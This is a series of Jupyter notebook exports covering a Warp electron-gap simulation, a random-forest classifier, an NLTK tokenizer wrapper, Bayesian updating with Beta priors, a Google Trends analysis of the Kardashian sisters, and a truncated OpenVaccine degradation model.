midpoint = 1 - np.max(potential[xl:xu,zl:zu])/(np.max(potential[xl:xu,zl:zu]) + abs(np.min(potential[xl:xu,zl:zu])))
plt.xlabel("z ($\mu$m)")
plt.ylabel("x ($\mu$m)")
plt.title("$\phi$ Across Whole Domain")
pxmin = ((X_MAX - X_MIN) / X_CELLS * xl + X_MIN) * 1e6
pxmax = ((X_MAX - X_MIN) / X_CELLS * xu + X_MIN) * 1e6
pzmin = (Z_MIN + zl / Z_CELLS * Z_MAX) * 1e6
pzmax = (Z_MAX * zu / Z_CELLS) * 1e6
plt.xlim(pzmin, pzmax)
plt.ylim(pxmin, pxmax)
phi_plt = plt.imshow(potential[xl:xu,zl:zu],cmap='viridis',extent=[pzmin, pzmax, pxmin, pxmax],aspect='auto')
cbar = fig.colorbar(phi_plt)
cbar.ax.set_xlabel("Volts")
cbar.ax.xaxis.set_label_position('top')
#plt.show()
###Output
_____no_output_____
###Markdown
Estimate the time of flight for an electron crossing the gapWe will estimate the average time of flight for a particle by averaging over the x-plane of the electric field, then integrating the particle motion in that averaged electric field. For our simulation particle we will take an electron with the expected velocity based on a thermal distribution with the cathode temperature.**Note that this requires importing the interp1d function from scipy.interpolate** ###Code
from scipy.interpolate import interp1d as scipy_interp1d
#Grab Ez from the solver and average over the transverse (x) plane
Ez = solverE.getez()
flat_Ez = numpy.mean(Ez,0)
#Generate an interpolating function for smooth particle integration
Ez_approx = scipy_interp1d(zmesh,flat_Ez, kind='cubic')
#Integrate the particle motion subject to initial conditions specified by the simulation
tof_expected = sources.compute_expected_time(beam, CATHODE_TEMP, Ez_approx, Z_MIN, Z_MAX, top.dt)
print "Expected time of flight is {}s".format(tof_expected)
print "This corresponds to {} steps".format(tof_expected/top.dt)
###Output
Expected time of flight is 1.95578558527e-11s
This corresponds to 1259.0 steps
###Markdown
Run simulation ###Code
#%%time
num_steps = 5000
output_steps = np.linspace(0,num_steps,num_steps/particleperiod + 1)[1:]
step_count = 0
time0 = time.time()
step(num_steps)
time1 = time.time()
time_per_step = (time1-time0)/num_steps
###Output
*** particle simulation package W3D running
###Markdown
Some basic diagnosticsA few diagnostics for testing. Specifically, we look at the current across the gap at the end of the simulation to verify that it's uniform at the value expected. ###Code
efield_path = diagFDir['electric']
efield_files = [os.path.join(efield_path,fn) for fn in os.listdir(efield_path)]
efield_files.sort()
fielddata_file = efield_files[-1]
step_number = int(findall(r'\d+', fielddata_file)[0])
data_efield = h5py.File(fielddata_file, 'r')
Ex = data_efield['data/%s/meshes/E/x' % (step_number)]
Ey = data_efield['data/%s/meshes/E/y' % (step_number)]
Ez = data_efield['data/%s/meshes/E/z' % (step_number)]
phi = data_efield['data/%s/meshes/phi'% (step_number)]
particles_path = diagDir
particles_files = [os.path.join(particles_path,fn) for fn in os.listdir(particles_path)]
particles_files.sort()
particledata_file = particles_files[-1]
# Read single particle diagnostic file in
f0 = readparticles(particledata_file.format(num_steps))
# Read all particles into directory. Structure: name[int stepnumber][str Species name]
fall = loadparticlefiles(particles_path)
def get_zcurrent_new(particle_array, momenta, mesh, particle_weight, dz):
    """
    Find z-directed current on a per cell basis
    particle_array: z positions at a given step
    momenta: particle momenta at a given step in SI units
    mesh: Array of Mesh spacings
    particle_weight: Weight from Warp
    dz: Cell Size
    """
    charge = 1.60217662e-19
    mass = 9.10938356e-31
    current = np.zeros_like(mesh)
    velocity = c * momenta / np.sqrt(momenta**2 + (mass * c)**2)
    for index, zval in enumerate(particle_array):
        bucket = np.round(zval/dz) #value of the bucket/index in the current array
        current[int(bucket)] += velocity[index]
    return current* charge * particle_weight / dz
# Get current for all steps (takes a long time)
current_history = []
for i in range(particleperiod,num_steps,particleperiod):
    #print i
    curr = get_zcurrent_new(fall[i]['beam'][:,4],fall[i]['beam'][:,5],zmesh,beam.sw,dz)
    current_history.append(curr)
current_history = np.asarray(current_history)
#Plot the current across gap at a single time
fig5 = plt.figure(figsize=(16,6))
#scalings
h_scale = 1.e6
y_range_max = beam.ibeam*1.e3*1.2
#current plotted from grid
plt.plot(zmesh*h_scale,np.array(current_history[-1])*1e3,'k')
#Compute and plot idealized currents as needed
RD_ideal = np.ones(len(zmesh))*sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
JCL_ideal = np.ones(len(zmesh))*cl_limit*cathode_area
if (RD_ideal[0]*1e3 <= y_range_max):
    plt.plot(zmesh*h_scale,RD_ideal*1.e3,'r--',label=r'Richardson-Dushman')
if (JCL_ideal[0]*1e3 <= y_range_max):
    plt.plot(zmesh*h_scale,JCL_ideal*1.e3,'b--',label=r'I$_{cl}$ cold limit')
#labels and legends
plt.xlabel("z ($\mu$m)",fontsize='16')
plt.ylabel("current (mA)",fontsize='16')
plt.title("Current - {:.4E}s".format(fall[num_steps]['time']),fontsize=18)
plt.xlim(Z_MIN,Z_MAX*1.e6)
plt.ylim(0, y_range_max)
plt.legend(loc=4)
title = 'current_{:.4f}ps-test.pdf'.format(CATHODE_TEMP,fall[num_steps]['time']*1.e9)
#fig5.savefig(title,bbox_inches='tight')
###Output
_____no_output_____
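###Markdown
The timing variables captured around the stepping loop above were never displayed; the short cell below (my own addition) reports the measured cost per step and the total wall time of the run. ###Code
# Report the wall-clock timing gathered around step(num_steps) above
print "Average time per step: {:.3e} s".format(time_per_step)
print "Total wall time for {} steps: {:.1f} s".format(num_steps, time1 - time0)
###Output
_____no_output_____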
RandomForest_Classifier.ipynb
###Markdown Importing data ###Code data=pd.read_csv('Social_Network_Ads.csv') print(data.head()) data.describe() ###Output _____no_output_____ ###Markdown Checking null values ###Code data.isnull().sum() ###Output _____no_output_____ ###Markdown Splitting data ###Code from sklearn.model_selection import train_test_split x=data.iloc[:,:-1].values y=data.iloc[:,-1].values.reshape(-1,1) x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.25,random_state=0) ###Output _____no_output_____ ###Markdown Feature Scaling ###Code from sklearn.preprocessing import StandardScaler sc=StandardScaler() x_train=sc.fit_transform(x_train) x_test=sc.transform(x_test) ###Output _____no_output_____ ###Markdown Model Build and Train ###Code from sklearn.ensemble import RandomForestClassifier rmc=RandomForestClassifier(n_estimators=100,criterion='entropy',random_state=0) rmc.fit(x_train,y_train) rmc.score(x_train,y_train) ###Output _____no_output_____ ###Markdown prediction using model ###Code y_pred=rmc.predict(x_test).reshape(-1,1) print(np.concatenate((y_test,y_pred),axis=1)) ###Output [[0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 1] [0 0] [0 0] [0 0] [0 0] [0 0] [0 1] [0 1] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [0 0] [1 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 0] [1 1] [0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [1 1] [0 0] [0 0] [0 0] [1 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [0 0] [1 1] [0 0] [0 0] [0 0] [0 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [0 0] [1 1] [1 1] [1 1] [0 1] [0 0] [0 0] [1 1] [1 0] [0 0] [1 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [1 0] [0 0] [1 1] [1 1] [1 1]] ###Markdown Model Accuracy ###Code from sklearn.metrics import accuracy_score accuracy_score(y_test,y_pred) ###Output _____no_output_____ ###Markdown Confusion Matrix ###Code from sklearn.metrics import confusion_matrix confusion_matrix(y_test,y_pred) ###Output _____no_output_____
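###Markdown
As an optional robustness check that was not part of the original analysis, k-fold cross-validation gives an accuracy estimate that depends less on the particular train/test split: ###Code
# 10-fold cross-validation of the same classifier on the scaled training data
from sklearn.model_selection import cross_val_score
cv_scores = cross_val_score(estimator=rmc, X=x_train, y=y_train.ravel(), cv=10)
print("CV accuracy: {:.3f} +/- {:.3f}".format(cv_scores.mean(), cv_scores.std()))
###Output
_____no_output_____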
tomef/tokenizer/pt_tokenizer.py.ipynb
###Markdown PT Tokenizer ← ↑This is a wrapper around the Penn Treebank tokenizer provided by the NLTK.For more information see https://www.nltk.org/api/nltk.tokenize.html--- Setup and Settings--- ###Code from __init__ import init_vars init_vars(vars()) import nltk try: nltk.data.find('tokenizers/punkt') except LookupError: nltk.download('punkt') from nltk.tokenize import word_tokenize import tokenizer.common from tokenizer.token_util import TokenizerBase ###Output _____no_output_____ ###Markdown --- Build PTTokenizer class--- ###Code class PTTokenizer(TokenizerBase): def tokenize(self, text, *args): text = text.replace(tokenizer.common.separator_token,tokenizer.common.separator_token_replacement) return word_tokenize(text) ###Output _____no_output_____
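###Markdown
A quick usage sketch, assuming `TokenizerBase` requires no constructor arguments and that the `tokenizer.common` module imported above is available; the sample sentence is arbitrary. ###Code
# Instantiate the wrapper and tokenize a sample sentence.
# Penn Treebank rules split contractions, e.g. "doesn't" -> "does", "n't".
pt_tokenizer = PTTokenizer()
print(pt_tokenizer.tokenize("Dr. Smith doesn't like this sentence."))
###Output
_____no_output_____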
10_bayesian_machine_learning/01_updating_conjugate_priors.ipynb
###Markdown Bayesian Updating with Conjugate Priors When the data consists of binary Bernoulli random variables with a certain success probability for a positive outcome, the number of successes in repeated trials follows a Binomial distribution. The conjugate prior is the Beta distribution with support over the interval [0, 1] and two shape parameters to model arbitrary prior distributions over the success probability. Hence, the posterior distribution is also a Beta distribution that we can derive by directly updating the parameters. Setup ###Code import warnings warnings.filterwarnings('ignore') %matplotlib inline import numpy as np import pandas as pd from matplotlib import pyplot as plt import seaborn as sns import scipy.stats as stats from matplotlib.ticker import FuncFormatter import matplotlib as mpl mpl.rcParams['text.usetex'] = True mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}'] np.random.seed(42) sns.set_style('dark') ###Output _____no_output_____ ###Markdown Formatting Helper ###Code def format_plot(axes, i, p, y, trials, success, true_p, tmle, tmap=None): fmt = FuncFormatter(lambda x, _: f'{x:.0%}') if i >= 6: axes[i].set_xlabel("$p$, Success Probability") axes[i].xaxis.set_major_formatter(fmt) else: axes[i].axes.get_xaxis().set_visible(False) if i % 3 == 0: axes[i].set_ylabel("Posterior Probability") axes[i].set_yticks([], []) axes[i].plot(p, y, lw=1, c='k') axes[i].fill_between(p, y, color='darkblue', alpha=0.4) axes[i].vlines(true_p, 0, max(10, np.max(y)), color='k', linestyle='--', lw=1) axes[i].set_title(f'Trials: {trials:,d} - Success: {success:,d}') if i > 0: smle = r"$\theta_{{\mathrm{{MLE}}}}$ = {:.2%}".format(tmle) axes[i].text(x=.02, y=.85, s=smle, transform=axes[i].transAxes) smap = r"$\theta_{{\mathrm{{MAP}}}}$ = {:.2%}".format(tmap) axes[i].text(x=.02, y=.75, s=smap, transform=axes[i].transAxes) return axes[i] ###Output _____no_output_____ ###Markdown Simulate Coin Tosses & Updates of Posterior ###Code n_trials = [0, 1, 3, 5, 10, 25, 50, 100, 500] outcomes = stats.bernoulli.rvs(p=0.5, size=n_trials[-1]) p = np.linspace(0, 1, 100) # uniform (uninformative) prior a = b = 1 fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True) axes = axes.flatten() fmt = FuncFormatter(lambda x, _: f'{x:.0%}') for i, trials in enumerate(n_trials): successes = outcomes[:trials] theta_mle = np.mean(successes) heads = sum(successes) tails = trials - heads update = stats.beta.pdf(p, a + heads , b + tails) theta_map = pd.Series(update, index=p).idxmax() axes[i] = format_plot(axes, i, p, update, trials=trials, success=heads, true_p=.5, tmle=theta_mle, tmap=theta_map) title = 'Bayesian Probabilities: Updating the Posterior' fig.suptitle(title, y=1.02, fontsize=14) fig.tight_layout() ###Output _____no_output_____ ###Markdown Stock Price Moves We will collect samples of different sizes of binarized daily S&P 500 returns where the positive outcome is a price increase. Starting from an uninformative prior that allocates equal probability to each possible success probability in the interval [0, 1], we compute the posterior for different evidence samples. 
###Code
sp500_returns = pd.read_hdf('../data/assets.h5', key='sp500/fred').loc['2010':, 'close']
sp500_binary = (sp500_returns.pct_change().dropna() > 0).astype(int)
###Output
_____no_output_____
###Markdown
The following code sample shows that the update consists of simply adding the observed numbers of successes and failures to the parameters of the prior distribution to obtain the posterior. The resulting posterior distributions are plotted below. They illustrate the evolution from a uniform prior that views all success probabilities as equally likely to an increasingly peaked distribution. After 500 samples, the probability is concentrated near the actual probability of a positive move at 54.7% from 2010 to 2017. It also shows the small differences between MLE and MAP estimates, where the latter tends to be pulled slightly towards the expected value of the uniform prior. ###Code
n_days = [0, 1, 3, 5, 10, 25, 50, 100, 500]
# random sample of trading days
# outcomes = sp500_binary.sample(n_days[-1])
# initial 500 trading days
outcomes = sp500_binary.iloc[:n_days[-1]]
p = np.linspace(0, 1, 100)
# uniform (uninformative) prior
a = b = 1
fig, axes = plt.subplots(nrows=3, ncols=3, figsize=(14, 7), sharex=True)
axes = axes.flatten()
for i, days in enumerate(n_days):
    successes = outcomes.iloc[:days]
    theta_mle = successes.mean()
    up = successes.sum()
    down = days - up
    update = stats.beta.pdf(p, a + up , b + down)
    theta_map = pd.Series(update, index=p).idxmax()
    axes[i] = format_plot(axes, i, p, update, trials=days, success=up,
                          true_p=sp500_binary.mean(), tmle=theta_mle,
                          tmap=theta_map)
title = 'Bayesian Probabilities: Updating the Posterior'
fig.suptitle(title, y=1.02, fontsize=14)
fig.tight_layout()
###Output
_____no_output_____
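###Markdown
Because the Beta prior is conjugate, the posterior summaries can also be checked in closed form: with prior parameters $a, b$ and $k$ successes in $n$ trials, the posterior mean is $(a+k)/(a+b+n)$ and the MAP is $(a+k-1)/(a+b+n-2)$. For the uniform prior $a=b=1$ the MAP reduces exactly to the MLE $k/n$, so any small gaps visible in the panels come from evaluating the density on a 100-point grid. A quick sketch using the first 500 trading days from above: ###Code
# Closed-form posterior statistics for the Beta-Binomial model with a uniform prior
n = 500
k = sp500_binary.iloc[:n].sum()  # number of up-days in the evidence sample
post_mean = (1 + k) / (2 + n)    # (a + k) / (a + b + n) with a = b = 1
post_map = k / n                 # (a + k - 1) / (a + b + n - 2) equals the MLE for a = b = 1
print(f'Posterior mean: {post_mean:.2%} | MAP = MLE: {post_map:.2%}')
###Output
_____no_output_____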
_notebooks/2020-08-20-01-Up-and-Down-With-the-Kardashians.ipynb
###Markdown Up and Down With the Kardashians> While I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content. In this Project, you will explore the data underneath the hype in the form of search interest data from Google Trends. You'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of your own. And you'll answer the big question - "is Kim even the most famous sister anymore?" This is the Result of Project "Up and Down With the Kardashians", via datacamp.- toc: true - badges: true- comments: true- author: Chanseok Kang- categories: [Python, Datacamp, Data_Science, Visualization]- image: images/kardashian_jenner_family_tree.png 1. The sisters and Google TrendsWhile I'm not a fan nor a hater of the Kardashians and Jenners, the polarizing family intrigues me. Why? Their marketing prowess. Say what you will about them and what they stand for, they are great at the hype game. Everything they touch turns to content.The sisters in particular over the past decade have been especially productive in this regard. Let's get some facts straight. I consider the "sisters" to be the following daughters of Kris Jenner. Three from her first marriage to lawyer Robert Kardashian:Kourtney Kardashian (daughter of Robert Kardashian, born in 1979)Kim Kardashian (daughter of Robert Kardashian, born in 1980)Khloé Kardashian (daughter of Robert Kardashian, born in 1984)And two from her second marriage to Olympic gold medal-winning decathlete, Caitlyn Jenner (formerly Bruce):Kendall Jenner (daughter of Caitlyn Jenner, born in 1995)Kylie Jenner (daughter of Caitlyn Jenner, born in 1997)This family tree can be confusing, but we aren't here to explain it. We're here to explore the data underneath the hype, and we'll do it using search interest data from Google Trends. We'll recreate the Google Trends plot to visualize their ups and downs over time, then make a few custom plots of our own. And we'll answer the big question: is Kim even the most famous sister anymore?First, let's load and inspect our Google Trends data, which was downloaded in CSV form. The query parameters: each of the sisters, worldwide search data, 2007 to present day. (2007 was the year Kim became "active" according to Wikipedia.) ###Code import matplotlib.pyplot as plt import pandas as pd plt.rcParams['figure.figsize'] = (10, 8) # Read in dataset trends = pd.read_csv('./dataset/trends_kj_sisters.csv') # Inspect data trends.head() ###Output _____no_output_____ ###Markdown 2. Better "kolumn" namesSo we have a column for each month since January 2007 and a column for the worldwide search interest for each of the sisters each month. By the way, Google defines the values of search interest as: Numbers represent search interest relative to the highest point on the chart for the given region and time. A value of 100 is the peak popularity for the term. A value of 50 means that the term is half as popular. A score of 0 means there was not enough data for this term.Okay, that's great Google, but you are not making this data easily analyzable for us. I see a few things. Let's do the column names first. A column named "Kim Kardashian: (Worldwide)" is not the most usable for coding purposes. Let's shorten those so we can access their values better. Might as well standardize all column formats, too. 
I like lowercase, short column names. ###Code
# Make column names easier to work with
trends.columns = ['month', 'kim', 'khloe', 'kourtney', 'kendall', 'kylie']
# Inspect data
trends.head()
###Output
_____no_output_____
###Markdown
3. Pesky data typesThat's better. We don't need to scroll our eyes across the table to read the values anymore since it is much less wide. And seeing five columns that all start with the letter "k" … the aesthetics … we should call them "kolumns" now! (Bad joke.) The next thing I see that is going to be an issue is that "<" sign. If "a score of 0 means there was not enough data for this term," "<1" must mean it is between 0 and 1 and Google does not want to give us the fraction from google.trends.com for whatever reason. That's fine, but this "<" sign means we won't be able to analyze or visualize our data right away because those column values aren't going to be represented as numbers in our data structure. Let's confirm that by inspecting our data types. ###Code
# Inspect data types
trends.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null object
3 kourtney 147 non-null object
4 kendall 147 non-null object
5 kylie 147 non-null int64
dtypes: int64(2), object(4)
memory usage: 7.0+ KB
###Markdown
4. From object to integerYes, okay, the khloe, kourtney, and kendall columns aren't integers like the kim and kylie columns are. Again, because of the "<" sign that indicates a search interest value between zero and one. Is this an early hint at the hierarchy of sister popularity? We'll see shortly. Before that, we'll need to remove that pesky "<" sign. Then we can change the type of those columns to integer. ###Code
# Loop through columns
for column in trends.columns:
    # Only modify columns that have the "<" sign
    if "<" in trends[column].to_string():
        # Remove "<" and convert dtype to integer
        trends[column] = trends[column].str.replace("<", "")
        trends[column] = pd.to_numeric(trends[column])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null object
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: int64(5), object(1)
memory usage: 7.0+ KB
###Markdown
5. From object to datetimeOkay, great, no more "<" signs. All the sister columns are of integer type. Now let's convert our month column from type object to datetime to make our date data more accessible. ###Code
# Convert month to type datetime
trends['month'] = pd.to_datetime(trends['month'])
# Inspect data types and data
trends.info()
trends.head()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 147 entries, 0 to 146
Data columns (total 6 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 month 147 non-null datetime64[ns]
1 kim 147 non-null int64
2 khloe 147 non-null int64
3 kourtney 147 non-null int64
4 kendall 147 non-null int64
5 kylie 147 non-null int64
dtypes: datetime64[ns](1), int64(5)
memory usage: 7.0 KB
###Markdown
6. Set month as indexAnd finally, let's set the month column as our index to wrap our data cleaning. 
###Markdown 6. Set month as index
And finally, let's set the month column as our index to wrap up our data cleaning. Having month as the index rather than the default zero-based row numbers will let us write shorter plotting code, since month will automatically serve as our x-axis. ###Code # Set month as DataFrame index
trends = trends.set_index('month')

# Inspect the data
trends.head() ###Output _____no_output_____ ###Markdown 7. The early Kim hype
Okay! So our data is ready to plot. Because we cleaned our data, remaking the Google Trends chart now takes little more than a single call to the DataFrame's plot method, plus the %matplotlib inline magic to make the plot show up in our notebook. ###Code # Plot search interest vs. month
%matplotlib inline
fig, ax = plt.subplots(figsize=(10, 8))
trends.plot(ax=ax); ###Output _____no_output_____ ###Markdown 8. Kylie's rise
Oh my! There is so much to make sense of here. Kim's sharp rise in 2007, with the beginning of Keeping Up with the Kardashians, among other things. There was no significant search interest for the other four sisters until mid-2009 when Kourtney and Khloé launched the reality television series, Kourtney and Khloé Take Miami. Then there was Kim's rise from famous to literally more famous than God in 2011. This Cosmopolitan article covers the timeline that includes the launch of music videos, fragrances, iPhone and Android games, another television series, joining Instagram, and more. Then there was Kim's ridiculous spike in December 2014: posing naked on the cover of Paper Magazine in a bid to break the internet will do that for you.

A curious thing starts to happen after that bid as well. Let's zoom in… ###Code # Zoom in from January 2014
fig, ax = plt.subplots(figsize=(10, 8))
trends.loc['2014-01':'2019-03'].plot(ax=ax); ###Output _____no_output_____ ###Markdown 9. Smooth out the fluctuations with rolling means
It looks like my suspicion may be true: Kim is not always the most searched Kardashian or Jenner sister. Since late 2016, in various months, Kylie overtakes Kim. Two big spikes where she smashed Kim's search interest: in September 2017, when it was reported that Kylie was expecting her first child with rapper Travis Scott, and in February 2018, when she gave birth to her daughter, Stormi Webster. The continued success of Kylie Cosmetics has kept her in the news, not to mention making her "The Youngest Self-Made Billionaire Ever" according to Forbes.

These fluctuations are descriptive but do not really help us answer our question: is Kim even the most famous sister anymore? We can use rolling means to smooth out short-term fluctuations in time series data and highlight long-term trends. Let's make the window twelve months, a.k.a. one year. ###Code # Smooth the data with rolling means
fig, ax = plt.subplots(figsize=(10, 8))
trends.rolling(window=12).mean().plot(ax=ax); ###Output _____no_output_____
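###Markdown As a quick follow-up of my own (a sketch, not part of the original project), the same rolling means can answer the "who leads?" question numerically: idxmax(axis=1) returns, for each month, the column with the highest smoothed interest, and value_counts() tallies how often each sister comes out on top. ###Code # Added sketch: count, per month, which sister leads the 12-month rolling mean
rolling = trends.rolling(window=12).mean().dropna()

# idxmax(axis=1) gives the leading column name for each row (month)
rolling.idxmax(axis=1).value_counts() ###Output _____no_output_____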
###Markdown 10. Who's more famous? The Kardashians or the Jenners?
Whoa, okay! So by this metric, Kim is still the most famous sister despite Kylie being close and nearly taking her crown. Honestly, the biggest takeaway from this whole exercise might be Kendall not showing up that much. It makes sense, though, despite her wildly successful modeling career. Some have called her "the only normal one in her family" as she tends to shy away from the more dramatic and controversial parts of the media limelight that generate oh so many clicks.

Let's end this analysis with one last plot. In it, we will plot (pun!) the Kardashian sisters against the Jenner sisters to see which family line is more popular now. We will use average search interest to make things fair, i.e., total search interest divided by the number of sisters in the family line.

The answer? Since 2015, it has been a toss-up. And in the future? With this family and their penchant for big events, who knows? ###Code # Average search interest for each family line
trends['kardashian'] = trends[['kim', 'khloe', 'kourtney']].sum(axis=1) / 3
trends['jenner'] = trends[['kendall', 'kylie']].sum(axis=1) / 2

# Plot average family line search interest vs. month
fig, ax = plt.subplots(figsize=(10, 8))
trends[['kardashian', 'jenner']].plot(ax=ax); ###Output _____no_output_____
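###Markdown A small design note on the averaging above (my addition, not the original code): dividing a row-wise sum by a hard-coded 3 or 2 works, but pandas' mean(axis=1) computes the same per-month averages with the divisor implied by the number of columns, so the lists of sisters could change without the constants going stale. ###Code # Added sketch: equivalent family-line averages using DataFrame.mean
trends['kardashian'] = trends[['kim', 'khloe', 'kourtney']].mean(axis=1)
trends['jenner'] = trends[['kendall', 'kylie']].mean(axis=1)

# Same plot as above, now driven by the mean-based columns
fig, ax = plt.subplots(figsize=(10, 8))
trends[['kardashian', 'jenner']].plot(ax=ax); ###Output _____no_output_____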
Model backlog/Models/88-openvaccine-6xconv-bigru-aug-sampling-5-v2.ipynb
###Markdown Dependencies ###Code from openvaccine_scripts import * import warnings, json from sklearn.model_selection import KFold, StratifiedKFold, GroupKFold import tensorflow.keras.layers as L import tensorflow.keras.backend as K from tensorflow.keras import optimizers, losses, Model from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau SEED = 0 seed_everything(SEED) warnings.filterwarnings('ignore') ###Output _____no_output_____ ###Markdown Model parameters ###Code config = { "BATCH_SIZE": 32, "EPOCHS": 70, "LEARNING_RATE": 1e-3, "ES_PATIENCE": 10, "N_FOLDS": 5, "N_USED_FOLDS": 5, "PB_SEQ_LEN": 107, "PV_SEQ_LEN": 130, } with open('config.json', 'w') as json_file: json.dump(json.loads(json.dumps(config)), json_file) config ###Output _____no_output_____ ###Markdown Load data ###Code database_base_path = '/kaggle/input/stanford-covid-vaccine/' train = pd.read_json(database_base_path + 'train.json', lines=True) test = pd.read_json(database_base_path + 'test.json', lines=True) print('Train samples: %d' % len(train)) display(train.head()) print(f'Test samples: {len(test)}') display(test.head()) ###Output Train samples: 2400 ###Markdown Data augmentation ###Code def aug_data(df): target_df = df.copy() new_df = aug_df[aug_df['id'].isin(target_df['id'])] del target_df['structure'] del target_df['predicted_loop_type'] new_df = new_df.merge(target_df, on=['id','sequence'], how='left') df['cnt'] = df['id'].map(new_df[['id','cnt']].set_index('id').to_dict()['cnt']) df['log_gamma'] = 100 df['score'] = 1.0 new_df['augmented'] = True df['augmented'] = False df = df.append(new_df[df.columns]) return df # Augmented data aug_df = pd.read_csv('/kaggle/input/augmented-data-for-stanford-covid-vaccine/48k_augment.csv') print(f'Augmented samples: {len(aug_df)}') display(aug_df.head()) print(f"Samples in train before augmentation: {len(train)}") # print(f"Samples in test before augmentation: {len(test)}") train = aug_data(train) train.drop('index', axis=1, inplace=True) train = train.reset_index() # test = aug_data(test) print(f"Samples in train after augmentation: {len(train)}") # print(f"Samples in test after augmentation: {len(test)}") print(f"Unique id in train: {len(train['id'].unique())}") print(f"Unique sequences in train: {len(train['sequence'].unique())}") print(f"Unique structure in train: {len(train['structure'].unique())}") print(f"Unique predicted_loop_type in train: {len(train['predicted_loop_type'].unique())}") # print(f"Unique sequences in test: {len(test['sequence'].unique())}") ###Output Augmented samples: 48401 ###Markdown Auxiliary functions ###Code def get_dataset(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0): input_map = {'inputs_seq': x['sequence'], 'inputs_struct': x['structure'], 'inputs_loop': x['predicted_loop_type'], 'inputs_bpps_max': x['bpps_max'], 'inputs_bpps_sum': x['bpps_sum'], 'inputs_bpps_scaled': x['bpps_scaled']} if labeled: output_map = {'output_react': y['reactivity'], 'output_bg_ph': y['deg_Mg_pH10'], 'output_ph': y['deg_pH10'], 'output_mg_c': y['deg_Mg_50C'], 'output_c': y['deg_50C']} if sample_weights is not None: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map)) if repeated: dataset = dataset.repeat() if shuffled: dataset = dataset.shuffle(2048, seed=seed) dataset = dataset.batch(batch_size) dataset = 
dataset.prefetch(buffer_size) return dataset def get_dataset_sampling(x, y=None, sample_weights=None, labeled=True, shuffled=True, repeated=False, batch_size=32, buffer_size=-1, seed=0): input_map = {'inputs_seq': x['sequence'], 'inputs_struct': x['structure'], 'inputs_loop': x['predicted_loop_type'], 'inputs_bpps_max': x['bpps_max'], 'inputs_bpps_sum': x['bpps_sum'], 'inputs_bpps_scaled': x['bpps_scaled']} if labeled: output_map = {'output_react': y['reactivity'], 'output_bg_ph': y['deg_Mg_pH10'], 'output_ph': y['deg_pH10'], 'output_mg_c': y['deg_Mg_50C'], 'output_c': y['deg_50C']} if sample_weights is not None: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map, sample_weights)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map, output_map)) else: dataset = tf.data.Dataset.from_tensor_slices((input_map)) if repeated: dataset = dataset.repeat() if shuffled: dataset = dataset.shuffle(2048, seed=seed) return dataset ###Output _____no_output_____ ###Markdown Pre-process ###Code # Add bpps as features train = add_bpps_features(train, database_base_path) test = add_bpps_features(test, database_base_path) feature_cols = ['sequence', 'structure', 'predicted_loop_type', 'bpps_max', 'bpps_sum', 'bpps_scaled'] pred_cols = ['reactivity', 'deg_Mg_pH10', 'deg_pH10', 'deg_Mg_50C', 'deg_50C'] encoder_list = [token2int_seq, token2int_struct, token2int_loop, None, None, None] public_test = test.query("seq_length == 107").copy() private_test = test.query("seq_length == 130").copy() x_test_public = get_features_dict(public_test, feature_cols, encoder_list, public_test.index) x_test_private = get_features_dict(private_test, feature_cols, encoder_list, private_test.index) # To use as stratified col train['signal_to_noise_int'] = train['signal_to_noise'].astype(int) ###Output _____no_output_____ ###Markdown Model ###Code def model_fn(hidden_dim=384, dropout=.5, pred_len=68, n_outputs=5): inputs_seq = L.Input(shape=(None, 1), name='inputs_seq') inputs_struct = L.Input(shape=(None, 1), name='inputs_struct') inputs_loop = L.Input(shape=(None, 1), name='inputs_loop') inputs_bpps_max = L.Input(shape=(None, 1), name='inputs_bpps_max') inputs_bpps_sum = L.Input(shape=(None, 1), name='inputs_bpps_sum') inputs_bpps_scaled = L.Input(shape=(None, 1), name='inputs_bpps_scaled') def _one_hot(x, num_classes): return K.squeeze(K.one_hot(K.cast(x, 'uint8'), num_classes=num_classes), axis=2) ohe_seq = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_seq)}, input_shape=(None, 1))(inputs_seq) ohe_struct = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_struct)}, input_shape=(None, 1))(inputs_struct) ohe_loop = L.Lambda(_one_hot, arguments={'num_classes': len(token2int_loop)}, input_shape=(None, 1))(inputs_loop) ### Encoder block # Conv block conv_seq = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_seq) conv_struct = L.Conv1D(filters=64, kernel_size=3, padding='same')(ohe_struct) conv_loop 